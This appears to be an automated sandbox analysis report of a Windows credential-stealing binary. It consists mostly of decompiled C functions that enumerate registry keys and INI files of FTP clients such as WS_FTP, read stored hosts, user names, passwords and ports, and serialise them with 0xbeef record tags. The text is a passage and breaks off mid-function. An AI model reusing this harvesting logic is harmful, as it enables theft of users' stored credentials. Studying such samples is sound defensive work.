                                                                        • API ID: Token$InformationProcess$CloseConvertCurrentErrorFreeHandleLastLocalOpenStringlstrcmp
                                                                        • String ID: S-1-5-18
                                                                        • API String ID: 795010888-4289277601
                                                                        • Opcode ID: 042bba242a62f65dbc0e78402b71d5b6602156a4b029cf2b9444344b761daa0e
                                                                        • Instruction ID: 29f45c5e056208b681b019c64babcbd0cb81e3e7f6b38da6c0e7be3b0a9b4890
                                                                        • Opcode Fuzzy Hash: 042bba242a62f65dbc0e78402b71d5b6602156a4b029cf2b9444344b761daa0e
                                                                        • Instruction Fuzzy Hash: D5218331A10209ABDF119FA4DD8ABEE7775BB40308F148576B110B51E1DBB8AA90DB4C
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E004064BB(void* __ecx, intOrPtr _a4, char* _a8) {
                                                                        				void* _v8;
                                                                        				int _v12;
                                                                        				int _v16;
                                                                        				char _v2064;
                                                                        				intOrPtr _v2068;
                                                                        				intOrPtr _v2072;
                                                                        				intOrPtr _v2076;
                                                                        				int* _v2080;
                                                                        				intOrPtr _v2084;
                                                                        				intOrPtr _v2088;
                                                                        				char _v2092;
                                                                        				int* _v2096;
                                                                        				char _v2100;
                                                                        				char _v2104;
                                                                        				long _t62;
                                                                        				long _t63;
                                                                        				intOrPtr* _t78;
                                                                        				intOrPtr* _t82;
                                                                        
                                                                        				_t62 = RegOpenKeyA( *0x4140fe, _a8,  &_v8); // executed
                                                                        				_t63 = _t62;
                                                                        				if(_t63 == 0) {
                                                                        					_v12 = 0;
                                                                        					while(1) {
                                                                        						_v16 = 0x7ff;
                                                                        						if(RegEnumKeyExA(_v8, _v12,  &_v2064,  &_v16, 0, 0, 0, 0) != 0) {
                                                                        							break;
                                                                        						}
                                                                        						_v2068 = E00401D69(E00401D15(_a8, "\\"),  &_v2064);
                                                                        						_v2080 = E00401C8E( *0x4140fe, _v2068, "Password",  &_v2104);
                                                                        						_v2072 = E00401C8E( *0x4140fe, _v2068, "Host", 0);
                                                                        						_v2076 = E00401C8E( *0x4140fe, _v2068, "Login", 0);
                                                                        						_v2084 = E00401C8E( *0x4140fe, _v2068, "InitialPath", 0);
                                                                        						_t78 = E00401C8E( *0x4140fe, _v2068, "Port",  &_v2092);
                                                                        						if(_t78 == 0 || _v2092 != 4) {
                                                                         							_v2088 = 0x15; // 0x15 = 21, used as the default port
                                                                        						} else {
                                                                        							 *_t24 =  *_t78;
                                                                        						}
                                                                        						E004017D5(_t78);
                                                                        						_t82 = E00401C8E( *0x4140fe, _v2068, "PasswordType",  &_v2100);
                                                                        						if(_t82 == 0 || _v2100 != 4) {
                                                                        							_v2096 = 0;
                                                                        						} else {
                                                                        							 *_t29 =  *_t82;
                                                                        						}
                                                                        						E004017D5(_t82);
                                                                        						if(_v2080 != 0 && _v2096 == 2 && (E004041BC(_v2080,  &_v2104, 0) == 0 || _v2104 == 0)) {
                                                                        							E004017D5(_v2080);
                                                                        							_v2080 = 0;
                                                                        						}
                                                                        						if(_v2080 != 0 && _v2072 != 0 && _v2076 != 0) {
                                                                        							E00401486(_a4, 0xbeef0002);
                                                                        							E004014E8(_a4, _v2072);
                                                                        							E004014E8(_a4, _v2076);
                                                                        							E004014BC(_a4, _v2080, _v2104);
                                                                        							E00401486(_a4, _v2088);
                                                                        							E004014E8(_a4, _v2084);
                                                                        						}
                                                                        						E004017D5(_v2080);
                                                                        						E004017D5(_v2072);
                                                                        						E004017D5(_v2076);
                                                                        						E004017D5(_v2084);
                                                                        						E004017D5(_v2068);
                                                                        						_v12 = _v12 + 1;
                                                                        					}
                                                                        					return RegCloseKey(_v8);
                                                                        				}
                                                                        				return _t63;
                                                                        			}






















                                                                        APIs
                                                                        • RegOpenKeyA.ADVAPI32(?,?), ref: 004064D1
                                                                        • RegEnumKeyExA.ADVAPI32 ref: 00406505
                                                                        • RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00406738
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CloseEnumOpen
                                                                        • String ID: Host$InitialPath$Login$Password$PasswordType$Port
                                                                        • API String ID: 1332880857-4069465341
                                                                        • Opcode ID: 4a6e00349b4c491ccb1d757ba87342954c5663798b67ca1a12abe626d30f0c31
                                                                        • Instruction ID: 8a8b12953b7785bcc2616ac66f0380b51c334fa7c9da36678472f7619d2a13f1
                                                                        • Opcode Fuzzy Hash: 4a6e00349b4c491ccb1d757ba87342954c5663798b67ca1a12abe626d30f0c31
                                                                        • Instruction Fuzzy Hash: 8F51F43194012CEADF226B52CC42BD9BAB9BF04704F14C0BAA549750B1DB7A4EA1DFD8
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E0040D0D7(void* __ecx, intOrPtr _a4, void* _a8, char* _a12) {
                                                                        				void* _v8;
                                                                        				int _v12;
                                                                        				char _v16;
                                                                        				int _v20;
                                                                        				char _v2068;
                                                                        				intOrPtr _v2072;
                                                                        				intOrPtr _v2076;
                                                                        				intOrPtr _v2080;
                                                                        				intOrPtr _v2084;
                                                                        				intOrPtr _v2088;
                                                                        				intOrPtr _v2092;
                                                                        				char _v2096;
                                                                        				intOrPtr _v2100;
                                                                        				long _t68;
                                                                        				long _t69;
                                                                        				intOrPtr* _t84;
                                                                        				void* _t108;
                                                                        
                                                                        				_t108 = __ecx;
                                                                        				_t68 = RegOpenKeyA(_a8, _a12,  &_v8); // executed
                                                                        				_t69 = _t68;
                                                                        				if(_t69 == 0) {
                                                                        					_v12 = 0;
                                                                        					while(1) {
                                                                        						_v20 = 0x7ff;
                                                                        						if(RegEnumKeyExA(_v8, _v12,  &_v2068,  &_v20, 0, 0, 0, 0) != 0) {
                                                                        							break;
                                                                        						}
                                                                        						_v2072 = E00401D15(E00401D15(_a12, "\\"),  &_v2068);
                                                                        						E004017D5(_t74);
                                                                        						_v2092 = E00401C8E(_a8, _v2072, "Password",  &_v16);
                                                                        						_v2076 = E00401C8E(_a8, _v2072, "ServerName", 0);
                                                                        						_v2080 = E00401C8E(_a8, _v2072, "UserID", 0);
                                                                        						_t84 = E00401C8E(_a8, _v2072, "PortNumber",  &_v2096);
                                                                        						if(_t84 == 0 || _v2096 != 4) {
                                                                        							_t85 = _t84;
                                                                        							if(_t84 != 0) {
                                                                        								E004017D5(_t85);
                                                                        							}
                                                                         							_v2084 = 0x15; // 0x15 = 21, used as the default port
                                                                        						} else {
                                                                        							 *_t27 =  *_t84;
                                                                        							E004017D5(_t84);
                                                                        						}
                                                                        						_v2088 = E00401C8E(_a8, _v2072, "InitialDirectory", 0);
                                                                        						_v2100 = E00401C8E(_a8, _v2072, "ServerType", 0);
                                                                        						if(_v2092 != 0 && E004041BC(_v2092,  &_v16, 0x41603f) != 0 && _v16 != 0 && _v2080 != 0 && _v2076 != 0) {
                                                                        							E00401486(_a4, 0xbeef0010);
                                                                        							E004014E8(_a4, _v2076);
                                                                        							E004014E8(_a4, _v2080);
                                                                        							E004014BC(_a4, _v2092, _v16);
                                                                        							E00401486(_a4, _v2084);
                                                                        							E004014E8(_a4, _v2088);
                                                                        							E004014E8(_a4, _v2100);
                                                                        						}
                                                                        						E004017D5(_v2092);
                                                                        						E004017D5(_v2076);
                                                                        						E004017D5(_v2088);
                                                                        						E004017D5(_v2080);
                                                                        						E004017D5(_v2100);
                                                                        						E0040D0D7(_t108, _a4, _a8, _v2072);
                                                                        						E004017D5(_v2072);
                                                                        						_v12 = _v12 + 1;
                                                                        					}
                                                                        					return RegCloseKey(_v8);
                                                                        				}
                                                                        				return _t69;
                                                                        			}





















                                                                        APIs
                                                                        • RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040D0EA
                                                                        • RegEnumKeyExA.ADVAPI32 ref: 0040D11E
                                                                        • RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 0040D327
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CloseEnumOpen
                                                                        • String ID: InitialDirectory$Password$PortNumber$ServerName$ServerType$UserID
                                                                        • API String ID: 1332880857-2649023343
                                                                        • Opcode ID: 60e72379dc5ff5237a2f394d070ac9166667d84441a53791c4176c62217b7b40
                                                                        • Instruction ID: f38a5596ae9a773ac0d22796df066d347c720fe0787782128e341da31621acfc
                                                                        • Opcode Fuzzy Hash: 60e72379dc5ff5237a2f394d070ac9166667d84441a53791c4176c62217b7b40
                                                                        • Instruction Fuzzy Hash: 5851B43194011CBADF226F91CC42BDD7AB9BF08314F14C0BAB548750B1DF7A9A95AF98
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E004079E2(intOrPtr _a4, void* _a8, char* _a12) {
                                                                        				void* _v8;
                                                                        				int _v12;
                                                                        				int _v16;
                                                                        				char _v2064;
                                                                        				intOrPtr _v2068;
                                                                        				intOrPtr _v2072;
                                                                        				intOrPtr _v2076;
                                                                        				intOrPtr _v2080;
                                                                        				char _v2084;
                                                                        				intOrPtr _v2088;
                                                                        				intOrPtr _v2092;
                                                                        				intOrPtr* _v2096;
                                                                        				char _v2100;
                                                                        				long _t66;
                                                                        				long _t67;
                                                                        				intOrPtr* _t82;
                                                                        
                                                                        				_t66 = RegOpenKeyA(_a8, _a12,  &_v8); // executed
                                                                        				_t67 = _t66;
                                                                        				if(_t67 == 0) {
                                                                        					_v12 = 0;
                                                                        					while(1) {
                                                                        						_v16 = 0x7ff;
                                                                        						if(RegEnumKeyExA(_v8, _v12,  &_v2064,  &_v16, 0, 0, 0, 0) != 0) {
                                                                        							break;
                                                                        						}
                                                                        						_v2068 = E00401D15(E00401D15(_a12, "\\"),  &_v2064);
                                                                        						E004017D5(_t72);
                                                                        						_v2080 = E00401C8E(_a8, _v2068, "Password", 0);
                                                                        						_v2072 = E00401C8E(_a8, _v2068, "HostName", 0);
                                                                        						_v2076 = E00401C8E(_a8, _v2068, "UserName", 0);
                                                                        						_v2088 = E00401C8E(_a8, _v2068, "RemoteDirectory", 0);
                                                                        						_t82 = E00401C8E( *0x4140fe, _v2068, "PortNumber",  &_v2084);
                                                                        						if(_t82 == 0 || _v2084 != 4) {
                                                                        							_t83 = _t82;
                                                                        							if(_t82 != 0) {
                                                                        								E004017D5(_t83);
                                                                        							}
                                                                        							_v2092 = 0x15;
                                                                        						} else {
                                                                        							 *_t28 =  *_t82;
                                                                        							E004017D5(_t82);
                                                                        						}
                                                                        						_v2096 = E00401C8E(_a8, _v2068, "FSProtocol",  &_v2100);
                                                                        						if(_v2080 != 0 && _v2072 != 0 && _v2076 != 0) {
                                                                        							E00401486(_a4, 0xbeef0010);
                                                                        							E004014E8(_a4, _v2072);
                                                                        							E004014E8(_a4, _v2076);
                                                                        							E004014E8(_a4, _v2080);
                                                                        							E00401486(_a4, _v2092);
                                                                        							E004014E8(_a4, _v2088);
                                                                        							if(_v2096 == 0 || _v2100 != 4) {
                                                                        								E00401486(_a4, 0);
                                                                        							} else {
                                                                        								E00401486(_a4,  *_v2096);
                                                                        							}
                                                                        						}
                                                                        						E004017D5(_v2080);
                                                                        						E004017D5(_v2072);
                                                                        						E004017D5(_v2076);
                                                                        						E004017D5(_v2088);
                                                                        						E004017D5(_v2096);
                                                                        						E004079E2(_a4, _a8, _v2068);
                                                                        						E004017D5(_v2068);
                                                                        						_v12 = _v12 + 1;
                                                                        					}
                                                                        					return RegCloseKey(_v8);
                                                                        				}
                                                                        				return _t67;
                                                                        			}




















                                                                        APIs
                                                                        • RegOpenKeyA.ADVAPI32(?,?,?), ref: 004079F5
                                                                        • RegEnumKeyExA.ADVAPI32 ref: 00407A29
                                                                        • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00407C3F
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CloseEnumOpen
                                                                        • String ID: FSProtocol$HostName$Password$PortNumber$RemoteDirectory$UserName
                                                                        • API String ID: 1332880857-3874328862
                                                                        • Opcode ID: 6aa040c6243baa02be8ddd97ebc68938d5727426411d611ec7b4e87c45dd2e9e
                                                                        • Instruction ID: fd264f026befac884e31df10338c99dd76bd249b7adf4ed45f8ce47fce3a56bd
                                                                        • Opcode Fuzzy Hash: 6aa040c6243baa02be8ddd97ebc68938d5727426411d611ec7b4e87c45dd2e9e
                                                                        • Instruction Fuzzy Hash: 3451E73194411CEADF22AF61CC42BDD7AB5BF04308F10C0BAB548751B1DB7AAA919F99
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E0040DCC7(void* _a4, char* _a8, intOrPtr _a12) {
                                                                        				void* _v8;
                                                                        				int _v12;
                                                                        				int _v16;
                                                                        				char _v2064;
                                                                        				intOrPtr _v2068;
                                                                        				intOrPtr _v2072;
                                                                        				intOrPtr _v2076;
                                                                        				intOrPtr _v2080;
                                                                        				intOrPtr _v2084;
                                                                        				char _v2088;
                                                                        				char* _v2092;
                                                                        				intOrPtr _v2096;
                                                                        				char _v2100;
                                                                        				long _t67;
                                                                        				long _t68;
                                                                        
                                                                        				_t67 = RegOpenKeyA(_a4, _a8,  &_v8); // executed
                                                                        				_t68 = _t67;
                                                                        				if(_t68 == 0) {
                                                                        					_v12 = 0;
                                                                        					while(1) {
                                                                        						_v16 = 0x7ff;
                                                                        						if(RegEnumKeyExA(_v8, _v12,  &_v2064,  &_v16, 0, 0, 0, 0) != 0) {
                                                                        							break;
                                                                        						}
                                                                        						_v2092 = E00401D15(E00401D15(_a8, "\\"),  &_v2064);
                                                                        						E004017D5(_t73);
                                                                        						_v2068 = E00401C8E(_a4, _v2092, "FTP destination server", 0);
                                                                        						_v2072 = E00401C8E(_a4, _v2092, "FTP destination user", 0);
                                                                        						_v2076 = E00401C8E(_a4, _v2092, "FTP destination password", 0);
                                                                        						_v2080 = E00401C8E(_a4, _v2092, "FTP destination port",  &_v2088);
                                                                        						_v2084 = E00401C8E(_a4, _v2092, "FTP destination catalog", 0);
                                                                        						_v2096 = E00401C8E(_a4, _v2092, "FTP profiles",  &_v2100);
                                                                        						if(_v2068 != 0 && _v2072 != 0 && _v2076 != 0) {
                                                                        							E00401486(_a12, 0xbeef0000);
                                                                        							E004014E8(_a12, _v2068);
                                                                        							E004014E8(_a12, _v2072);
                                                                        							E004014E8(_a12, _v2076);
                                                                        							E004014BC(_a12, _v2080, _v2088);
                                                                        							E004014E8(_a12, _v2084);
                                                                        						}
                                                                        						if(_v2100 != 0) {
                                                                        							E00401486(_a12, 0xbeef0001);
                                                                        							E004014BC(_a12, _v2096, _v2100);
                                                                        						}
                                                                        						E0040DCC7(_a4, _v2092, _a12);
                                                                        						E004017D5(_v2092);
                                                                        						E004017D5(_v2068);
                                                                        						E004017D5(_v2072);
                                                                        						E004017D5(_v2076);
                                                                        						E004017D5(_v2080);
                                                                        						E004017D5(_v2084);
                                                                        						E004017D5(_v2096);
                                                                        						_v12 = _v12 + 1;
                                                                        					}
                                                                        					return RegCloseKey(_v8);
                                                                        				}
                                                                        				return _t68;
                                                                        			}



















                                                                        APIs
                                                                        • RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040DCDA
                                                                        • RegEnumKeyExA.ADVAPI32 ref: 0040DD0E
                                                                        • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040DEF7
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CloseEnumOpen
                                                                        • String ID: FTP destination catalog$FTP destination password$FTP destination port$FTP destination server$FTP destination user$FTP profiles
                                                                        • API String ID: 1332880857-3620412361
                                                                        • Opcode ID: 132459a5dfa4ee88dd816024efc9ae046a1fc0875c057f1f5066dc3d87b767b1
                                                                        • Instruction ID: c7e1c623c9d0911d9fb61fdd086df822930df8ad3d0878dbfe468f7a3020db9c
                                                                        • Opcode Fuzzy Hash: 132459a5dfa4ee88dd816024efc9ae046a1fc0875c057f1f5066dc3d87b767b1
                                                                        • Instruction Fuzzy Hash: 2F51743194011CBADF226F91CC42BDD7AB6BF04304F1080BAB548751B1DF7A9AA5AFD8
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00407D34(intOrPtr _a4, void* _a8, char* _a12) {
                                                                        				void* _v8;
                                                                        				int _v12;
                                                                        				int _v16;
                                                                        				char _v2064;
                                                                        				intOrPtr _v2068;
                                                                        				intOrPtr _v2072;
                                                                        				intOrPtr _v2076;
                                                                        				intOrPtr _v2080;
                                                                        				char _v2084;
                                                                        				intOrPtr _v2088;
                                                                        				intOrPtr _v2092;
                                                                        				intOrPtr _v2096;
                                                                        				long _t63;
                                                                        				long _t64;
                                                                        
                                                                        				_t63 = RegOpenKeyA(_a8, _a12,  &_v8); // executed
                                                                        				_t64 = _t63;
                                                                        				if(_t64 == 0) {
                                                                        					_v12 = 0;
                                                                        					while(1) {
                                                                        						_v16 = 0x7ff;
                                                                        						if(RegEnumKeyExA(_v8, _v12,  &_v2064,  &_v16, 0, 0, 0, 0) != 0) {
                                                                        							break;
                                                                        						}
                                                                        						_v2068 = E00401D15(E00401D15(_a12, "\\"),  &_v2064);
                                                                        						E004017D5(_t69);
                                                                        						_v2080 = E00401C8E(_a8, _v2068, "PassWord",  &_v2084);
                                                                        						_v2072 = E00401C8E(_a8, _v2068, "Url", 0);
                                                                        						_v2076 = E00401C8E(_a8, _v2068, "UserName", 0);
                                                                        						_v2088 = E00401C8E(_a8, _v2068, "RootDirectory", 0);
                                                                        						_v2092 = E00401C8E(_a8, _v2068, "Port", 0);
                                                                        						_v2096 = E00401C8E(_a8, _v2068, "ServerType", 0);
                                                                        						if(_v2080 != 0 && _v2072 != 0 && _v2076 != 0) {
                                                                        							E00401486(_a4, 0xbeef0010);
                                                                        							E004014E8(_a4, _v2072);
                                                                        							E004014E8(_a4, _v2076);
                                                                        							E004014BC(_a4, _v2080, _v2084);
                                                                        							E004014E8(_a4, _v2092);
                                                                        							E004014E8(_a4, _v2088);
                                                                        							E004014E8(_a4, _v2096);
                                                                        						}
                                                                        						E004017D5(_v2080);
                                                                        						E004017D5(_v2072);
                                                                        						E004017D5(_v2076);
                                                                        						E004017D5(_v2088);
                                                                        						E004017D5(_v2092);
                                                                        						E004017D5(_v2096);
                                                                        						E00407D34(_a4, _a8, _v2068);
                                                                        						E004017D5(_v2068);
                                                                        						_v12 = _v12 + 1;
                                                                        					}
                                                                        					return RegCloseKey(_v8);
                                                                        				}
                                                                        				return _t64;
                                                                        			}

















                                                                        APIs
                                                                        • RegOpenKeyA.ADVAPI32(?,?,?), ref: 00407D47
                                                                        • RegEnumKeyExA.ADVAPI32 ref: 00407D7B
                                                                        • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00407F43
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CloseEnumOpen
                                                                        • String ID: PassWord$Port$RootDirectory$ServerType$Url$UserName
                                                                        • API String ID: 1332880857-2128033141
                                                                        • Opcode ID: fc8c4e02fa1479332a51c4a1468e6b433027faf32cb97c2702db40d0a608d150
                                                                        • Instruction ID: 4eb3fcfc5343b041dd0bd68344c2513e02b84b383dc5ec38f59f6f48277349fc
                                                                        • Opcode Fuzzy Hash: fc8c4e02fa1479332a51c4a1468e6b433027faf32cb97c2702db40d0a608d150
                                                                        • Instruction Fuzzy Hash: 6251723194011CBADF226F61CC42BED7AB6BF04304F14C0BAB558750B1DB7A5EA1AF99
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E0040260B(char* _a4, char* _a8, int _a12) {
                                                                        				void* _v8;
                                                                        				void* _v12;
                                                                        				char _v273;
                                                                        				CHAR* _v280;
                                                                        				long _t24;
                                                                        				long _t29;
                                                                        				CHAR* _t36;
                                                                        				void* _t37;
                                                                        				long _t45;
                                                                        				void* _t48;
                                                                        				void* _t49;
                                                                        
                                                                        				_t48 = 0;
                                                                        				_t24 = RegCreateKeyA( *0x4140fe, "Software\\WinRAR",  &_v8); // executed
                                                                        				if(_t24 == 0) {
                                                                        					_t45 = RegSetValueExA(_v8, _a4, 0, 3, _a8, _a12); // executed
                                                                        					if(_t45 == 0) {
                                                                        						_t48 = 1;
                                                                        					}
                                                                        					RegCloseKey(_v8); // executed
                                                                        				}
                                                                        				_t49 = _t48;
                                                                        				if(_t49 == 0) {
                                                                        					_t29 = GetTempPathA(0x104,  &_v273);
                                                                        					if(_t29 != 0 && _t29 <= 0x104) {
                                                                        						CreateDirectoryA( &_v273, 0);
                                                                        						if(E004024D7( &_v273) != 0) {
                                                                        							_t36 = E00401D15( &_v273, _a4);
                                                                        						} else {
                                                                        							_t36 = E00401D69(E00401D15( &_v273, "\\"), _a4);
                                                                        						}
                                                                        						_v280 = _t36;
                                                                        						_t37 = CreateFileA(_v280, 0xc0000000, 3, 0, 2, 0, 0);
                                                                        						_v12 = _t37;
                                                                        						if(_t37 + 1 != 0) {
                                                                        							_t49 = E004013C2(_v12, _a8, _a12);
                                                                        							CloseHandle(_v12);
                                                                        						}
                                                                        						_t49 = _t49;
                                                                        						if(_t49 == 0) {
                                                                        							DeleteFileA(_v280);
                                                                        						}
                                                                        						E004017D5(_v280);
                                                                        					}
                                                                        				}
                                                                        				return _t49;
                                                                        			}














                                                                        APIs
                                                                        • RegCreateKeyA.ADVAPI32(Software\WinRAR,?), ref: 00402626
                                                                        • RegSetValueExA.ADVAPI32(?,?,00000000,00000003,00000000,?,?,004106C7,Client Hash,?,00000010,00000000,?,00000000), ref: 0040263F
                                                                        • RegCloseKey.ADVAPI32(?,?,?,00000000,00000003,00000000,?,?,004106C7,Client Hash,?,00000010,00000000,?,00000000), ref: 0040264C
                                                                        • GetTempPathA.KERNEL32(00000104,?,?,004106C7,Client Hash,?,00000010,00000000,?,00000000), ref: 00402665
                                                                        • CreateDirectoryA.KERNEL32(?,00000000,00000104,?,?,004106C7,Client Hash,?,00000010,00000000,?,00000000), ref: 00402686
                                                                        • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000002,00000000,00000000,?,?,?,?,00000000,00000104,?,?,004106C7), ref: 004026E1
                                                                        • CloseHandle.KERNEL32(?,?,00000000,?,?,C0000000,00000003,00000000,00000002,00000000,00000000,?,?,?,?,00000000), ref: 004026FF
                                                                        • DeleteFileA.KERNEL32(?,?,C0000000,00000003,00000000,00000002,00000000,00000000,?,?,?,?,00000000,00000104,?), ref: 0040270E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Create$CloseFile$DeleteDirectoryHandlePathTempValue
                                                                        • String ID: Software\WinRAR
                                                                        • API String ID: 3443402316-224198155
                                                                        • Opcode ID: 9076fdc188a22cbd499bc2bbe3cd84482c40aeaeb152589b2374c6cdc2a871d9
                                                                        • Instruction ID: 17b1f1f750073906f68301a3bf6da54a844cbe047f9a048bb246b4ff058c1830
                                                                        • Opcode Fuzzy Hash: 9076fdc188a22cbd499bc2bbe3cd84482c40aeaeb152589b2374c6cdc2a871d9
                                                                        • Instruction Fuzzy Hash: C7219F71A4020CBBDF21AFE1DD86FDD7A29AF14748F1004B6B604B50E1E6F99AD09B58
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00404E40(void* __ecx, void* __edx, intOrPtr _a4) {
                                                                        				intOrPtr _v8;
                                                                        				char _v269;
                                                                        				CHAR* _v276;
                                                                        				int _t24;
                                                                        				void* _t25;
                                                                        				void* _t26;
                                                                        				long _t37;
                                                                        				long _t40;
                                                                        				void* _t47;
                                                                        				void* _t48;
                                                                        
                                                                        				_t48 = __edx;
                                                                        				_t47 = __ecx;
                                                                        				_v8 = E0040150D(_a4, 3, 0);
                                                                        				_t24 = GetWindowsDirectoryA( &_v269, 0x104);
                                                                        				if(_t24 != 0 && _t24 <= 0x104) {
                                                                        					_v276 = E00401D15( &_v269, "\\win.ini");
                                                                        					_t37 = GetPrivateProfileStringA("WS_FTP", "DIR", 0x4140dc,  &_v269, 0x104, _v276); // executed
                                                                        					if(_t37 != 0) {
                                                                        						E00404C68(_t47, _a4,  &_v269, 0);
                                                                        					}
                                                                        					_t40 = GetPrivateProfileStringA("WS_FTP", "DEFDIR", 0x4140dc,  &_v269, 0x104, _v276); // executed
                                                                        					_t52 = _t40;
                                                                        					if(_t40 != 0) {
                                                                        						E00404C68(_t47, _a4,  &_v269, 0);
                                                                        					}
                                                                        					E004017D5(_v276);
                                                                        				}
                                                                        				_t25 = E00401DCE(_t52, 0x2b); // executed
                                                                        				_t26 = _t25;
                                                                        				_t53 = _t26;
                                                                        				if(_t26 != 0) {
                                                                        					E00404C68(_t47, _a4, E00401D69(_t26, "\\Ipswitch\\WS_FTP"), 0); // executed
                                                                        					E004017D5(_t31);
                                                                        				}
                                                                        				E00404DF4(_t47, _t53, _a4, 0x1a, "\\Ipswitch"); // executed
                                                                        				E00404DF4(_t47, _t53, _a4, 0x23, "\\Ipswitch"); // executed
                                                                        				E00404DF4(_t47, _t53, _a4, 0x1c, "\\Ipswitch"); // executed
                                                                        				return E00401553(_t48, _t53, _a4, _v8);
                                                                        			}













                                                                        APIs
                                                                        • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00404E64
                                                                          • Part of subcall function 00401D15: lstrlenA.KERNEL32(?,?,?,004020A1,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF,00000000,00000000,00000000,00000000), ref: 00401D36
                                                                          • Part of subcall function 00401D15: lstrlenA.KERNEL32(?,?,?,?,004020A1,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF,00000000,00000000,00000000,00000000), ref: 00401D40
                                                                          • Part of subcall function 00401D15: lstrcpyA.KERNEL32(00000000,?,00000000,?,?,?,?,004020A1,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF,00000000,00000000), ref: 00401D54
                                                                          • Part of subcall function 00401D15: lstrcatA.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,?,004020A1,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF), ref: 00401D5D
                                                                        • GetPrivateProfileStringA.KERNEL32(WS_FTP,DIR,004140DC,?,00000104,?), ref: 00404EB4
                                                                        • GetPrivateProfileStringA.KERNEL32(WS_FTP,DEFDIR,004140DC,?,00000104,?), ref: 00404EEF
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: PrivateProfileStringlstrlen$DirectoryWindowslstrcatlstrcpy
                                                                        • String ID: DEFDIR$DIR$WS_FTP$\Ipswitch$\Ipswitch\WS_FTP$\win.ini
                                                                        • API String ID: 2508676433-45949541
                                                                        • Opcode ID: 01a537edadd59bddceef1694fae0bdf415c848880b34dd7182d3a1fe3049a342
                                                                        • Instruction ID: e00d4702d6b83cfd5b79c7bbcdca918ca21af511ae28e9f1c251b88d42575b58
                                                                        • Opcode Fuzzy Hash: 01a537edadd59bddceef1694fae0bdf415c848880b34dd7182d3a1fe3049a342
                                                                        • Instruction Fuzzy Hash: 452188B17902087ADF117AA1CC43FDA3A299F94744F1040777704B40E2EBFC9AC09A6C
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 92%
                                                                        			E0040EA6C(void* __eflags, void* _a4, char* _a8, intOrPtr _a12) {
                                                                        				void* _v8;
                                                                        				int _v12;
                                                                        				int _v16;
                                                                        				char _v2064;
                                                                        				intOrPtr _v2068;
                                                                        				intOrPtr _v2072;
                                                                        				CHAR* _v2076;
                                                                        				long _t33;
                                                                        				CHAR* _t48;
                                                                        				long _t49;
                                                                        
                                                                        				_v2076 = E004017EC(0x105);
                                                                        				_t33 = RegOpenKeyA(_a4, _a8,  &_v8); // executed
                                                                        				if(_t33 == 0) {
                                                                        					_v12 = 0;
                                                                        					while(1) {
                                                                        						_v16 = 0x7ff;
                                                                        						if(RegEnumKeyExA(_v8, _v12,  &_v2064,  &_v16, 0, 0, 0, 0) != 0) {
                                                                        							break;
                                                                        						}
                                                                        						_v2068 = E00401D15(E00401D15(_a8, "\\"),  &_v2064);
                                                                        						E004017D5(_t40);
                                                                        						_v2072 = E00401C8E(_a4, _v2068, "Path", 0);
                                                                        						__eflags = _v2072;
                                                                        						if(__eflags != 0) {
                                                                        							_t48 = E00401D15(_v2072, "\\PocoSystem.ini");
